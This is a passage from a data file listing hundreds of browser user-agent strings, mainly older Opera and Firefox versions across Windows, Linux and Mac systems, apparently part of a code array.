'Opera/9.61 (Windows NT 6.0; U; en) Presto/2.1.1',
'Opera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1',
'Opera/9.61 (Windows NT 6.0; U; pt-BR) Presto/2.1.1',
'Opera/9.61 (Windows NT 6.0; U; ru) Presto/2.1.1',
'Opera/9.61 (X11; Linux i686; U; de) Presto/2.1.1',
'Opera/9.61 (X11; Linux i686; U; en) Presto/2.1.1',
'Opera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1',
'Opera/9.61 (X11; Linux i686; U; ru) Presto/2.1.1',
'Opera/9.61 (X11; Linux x86_64; U; fr) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.1; U; pt-BR) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.1; U; ru) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.1; U; tr) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.1; U; zh-cn) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.1; U; zh-tw) Presto/2.1.1',
'Opera/9.62 (Windows NT 5.2; U; en) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.0; U; en) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.0; U; nb) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.0; U; pl) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.1; U; de) Presto/2.1.1',
'Opera/9.62 (Windows NT 6.1; U; en) Presto/2.1.1',
'Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1',
'Opera/9.62 (X11; Linux i686; U; fi) Presto/2.1.1',
'Opera/9.62 (X11; Linux i686; U; it) Presto/2.1.1',
'Opera/9.62 (X11; Linux i686; U; Linux Mint; en) Presto/2.1.1',
'Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1',
'Opera/9.62 (X11; Linux x86_64; U; en_GB, en_US) Presto/2.1.1',
'Opera/9.62 (X11; Linux x86_64; U; ru) Presto/2.1.1',
'Opera/9.63 (Windows NT 5.1; U; pt-BR) Presto/2.1.1',
'Opera/9.63 (Windows NT 5.2; U; de) Presto/2.1.1',
'Opera/9.63 (Windows NT 5.2; U; en) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.0; U; fr) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.0; U; nb) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.0; U; pl) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.1; U; de) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.1; U; en) Presto/2.1.1',
'Opera/9.63 (Windows NT 6.1; U; hu) Presto/2.1.1',
'Opera/9.63 (X11; FreeBSD 7.1-RELEASE i386; U; en) Presto/2.1.1',
'Opera/9.63 (X11; Linux i686)',
'Opera/9.63 (X11; Linux i686; U; de) Presto/2.1.1',
'Opera/9.63 (X11; Linux i686; U; en)',
'Opera/9.63 (X11; Linux i686; U; nb) Presto/2.1.1',
'Opera/9.63 (X11; Linux i686; U; ru)',
'Opera/9.63 (X11; Linux i686; U; ru) Presto/2.1.1',
'Opera/9.63 (X11; Linux x86_64; U; cs) Presto/2.1.1',
'Opera/9.63 (X11; Linux x86_64; U; ru) Presto/2.1.1',
'Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1',
'Opera/9.64 (Windows NT 6.0; U; pl) Presto/2.1.1',
'Opera/9.64 (Windows NT 6.0; U; zh-cn) Presto/2.1.1',
'Opera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1',
'Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; da) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; de) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; en) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; Linux Mint; it) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; nb) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; sv) Presto/2.1.1',
'Opera/9.64 (X11; Linux i686; U; tr) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; cs) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; en-GB) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; en) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; hr) Presto/2.1.1',
'Opera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1',
'Opera 9.7 (Windows NT 5.2; U; en)',
'Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15',
'Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',
'Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61',
'Opera/9.80 (S60; SymbOS; Opera Tablet/9174; U; en) Presto/2.7.81 Version/10.5',
'Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61',
'Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10',
'Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10',
'Opera/9.80 (Windows NT 5.1; U; en) Presto/2.9.168 Version/11.51',
'Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 5.1; U; MRA 5.6 (build 03278); ru) Presto/2.6.30 Version/10.63',
'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62',
'Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00',
'Opera/9.80 (Windows NT 5.1; U; sk) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00',
'Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10',
'Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63',
'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
'Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51',
'Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10',
'Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00',
'Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10',
'Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10',
'Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61',
'Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60',
'Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.10.229 Version/11.62',
'Opera/9.80 (Windows NT 6.0; U; pl) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1',
'Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10',
'Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61',
'Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00',
'Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52',
'Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70',
'Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00',
'Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50',
'Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00',
'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61',
'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00',
'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50',
'Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01',
'Opera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62',
'Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00',
'Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16',
'Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53',
'Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60',
'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61',
'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
'Opera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01',
'Opera/9.80 (X11; Linux i686; U; hu) Presto/2.9.168 Version/11.50',
'Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54',
'Opera/9.80 (X11; Linux i686; U; it) Presto/2.7.62 Version/11.00',
'Opera/9.80 (X11; Linux i686; U; ja) Presto/2.7.62 Version/11.01',
'Opera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61',
'Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
'Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10',
'Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01',
'Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00',
'Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9.168 Version/11.50',
'Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10',
'Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00',
'Opera/9.80 (X11; Linux x86_64; U; Ubuntu/10.10 (maverick); pl) Presto/2.7.62 Version/11.01',
'Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10',
'Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9',
'Opera/9.99 (X11; U; sk)',
'Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2',
'Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60',
'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60',
'Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00',
'Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00',
'Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02',
'Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)',
'Mozilla/4.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/2010324480 Firefox/3.5.4',
'Mozilla/4.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.7) Gecko/2008398325 Firefox/3.1.4',
'Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0a2) Gecko/20111101 Firefox/9.0a2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1',
'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009122115 Firefox/3.0.17',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090204 Firefox/3.1b3pre',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9b4) Gecko/2008030317 Firefox/3.0b4',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.23) Gecko/20110920 Firefox/3.6.23',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; he; rv:1.9.1b4pre) Gecko/20100405 Firefox/3.6.3plugin1',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12pre) Gecko/20080122 Firefox/2.0.0.12pre',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.13) Gecko/20080313 Firefox',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9.2.19) Gecko/20110707 Firefox/3.6.19',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.6) Gecko/20040206 Firefox/0.8',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7) Gecko/20040614 Firefox/0.9',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.4',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1b1) Gecko/20061110 Firefox/2.0b3',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060320 Firefox/2.0a1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20060322 Firefox/2.0a1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.7.3) Gecko/20040913 Firefox/0.10',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.8.1.16) Gecko/20080702 Firefox',
'Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0',
'Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13',
'Mozilla/5.0 (U; Windows NT 5.1; en-GB; rv:1.8.1.17) Gecko/20080808 Firefox/2.0.0.17',
'Mozilla/5.0 (Windows 98; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.0; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0',
'Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20120405 Firefox/14.0a1',
'Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/13.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:1.9a1) Gecko/20060217 Firefox/1.6a1',
'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre',
'Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre',
'Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0',
'Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0 FirePHP/0.6',
'Mozilla/5.0 (Windows NT 5.1; rv:8.0; en_us) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.1; U; tr; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5',
'Mozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre',
'Mozilla/5.0 (Windows NT 5.2; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0',
'Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1',
'Mozilla/5.0 (Windows NT 6.0; U; hu; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Windows NT 6.0; U; sv; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.1; de;rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/14.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/ 20120405 Firefox/14.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20120405 Firefox/14.0a1',
'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2',
'Mozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko/20100101 Firefox/4.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0b10) Gecko/20110126 Firefox/4.0b10',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0b10pre) Gecko/20110113 Firefox/4.0b10pre',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20110319 Firefox/4.0',
'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0',
'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/7.0',
'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0',
'Mozilla/5.0 (Windows NT 6.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0',
'Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1',
'Mozilla/5.0 (Windows NT 6.1; U;WOW64; de;rv:11.0) Gecko Firefox/11.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:14.0) Gecko/20120405 Firefox/14.0a1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b10pre) Gecko/20110118 Firefox/4.0b10pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110129 Firefox/4.0b11pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre',
